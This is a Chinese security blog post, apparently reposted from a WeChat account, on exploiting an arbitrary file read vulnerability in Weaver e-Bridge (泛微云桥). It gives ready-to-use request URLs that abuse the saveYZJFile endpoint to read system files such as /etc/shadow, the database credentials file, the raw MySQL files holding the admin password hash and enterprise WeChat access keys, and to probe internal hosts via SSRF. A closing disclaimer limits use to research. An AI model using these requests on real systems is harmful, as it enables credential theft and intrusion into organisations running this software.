泛微云桥-任意文件读取深入利用

admin 2021年9月14日04:06:29安全文章评论764 views1397字阅读4分39秒阅读模式

0.前言

最近碰到了一个泛微云桥的系统,然后发现这个系统存在任意文件读取漏洞,但是目标是Windows的系统。

记录一下,如何把这个漏洞利用最大化

漏洞POC

http://1.1.1.1:8088/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt

取出ID

泛微云桥-任意文件读取深入利用
image-20210513101515267

然后通过URL访问文件内容

http://1.1.1.1:8088/file/fileNoLogin/4dae2e3fdecc46d3a07279383273ba6f

泛微云桥-任意文件读取深入利用
image-20210513101616951

1.读文件

首先读取常规文件,linux下的/etc/shadow

其次可以读取项目配置文件,获取mysql账号密码

http://1.1.1.1:8088/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///d://ebridge/tomcat/webapps/ROOT/WEB-INF/classes/init.properties&fileExt=a.txt

泛微云桥-任意文件读取深入利用
image-20210513102214150

2.SSRF

这里除了是本地任意文件读取外,同样也支持http协议,并且可回显,在没有什么其他突破方式的情况下,可以通过这个探测内网

http://1.1.1.1:8088/wxjsapi/saveYZJFile?fileName=test&downloadUrl=http://127.0.0.1&fileExt=a.txt

泛微云桥-任意文件读取深入利用
image-20210513102337047

3.读后台管理密码哈希

泛微云桥的后台密码是存储在,此系统自带的MySQL中的ewechat.wx_base_user表中,储存路径相对固定。

可以通过直接读取mysql原始数据文件的方式,来获取密码hash

http://1.1.1.1:8088/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///D://ebridge/mysql/data/ewechat/wx_base_user.ibd&fileExt=a.txt

sysadmin后面的就是管理员密码哈希

泛微云桥-任意文件读取深入利用
image-20210513102941001

但是通过对泛微云桥代码进行审计,除了系统刚开始的默认密码1是通过md5进行储存的

泛微云桥-任意文件读取深入利用
image-20210513103217206

只要修改了后台密码,密码则是通过国密进行hash运算。获取hash后,可以考虑在本地进行破解

泛微云桥-任意文件读取深入利用
image-20210513103344520

4.读企业微信AK

泛微云桥是一个可以连通企业微信号和钉钉号、飞书的一款应用。如果管理员配置了微信的ak的话,可以通过读取数据表来获取

http://1.1.1.1:8088/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///D://ebridge/mysql/data/ewechat/wx_cp_corpinfo.ibd&fileExt=a.txt

泛微云桥-任意文件读取深入利用
image-20210513103857509

泛微云桥-任意文件读取深入利用


本文始发于微信公众号(漏洞推送):泛微云桥-任意文件读取深入利用

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月14日04:06:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  泛微云桥-任意文件读取深入利用 http://cn-sec.com/archives/373033.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: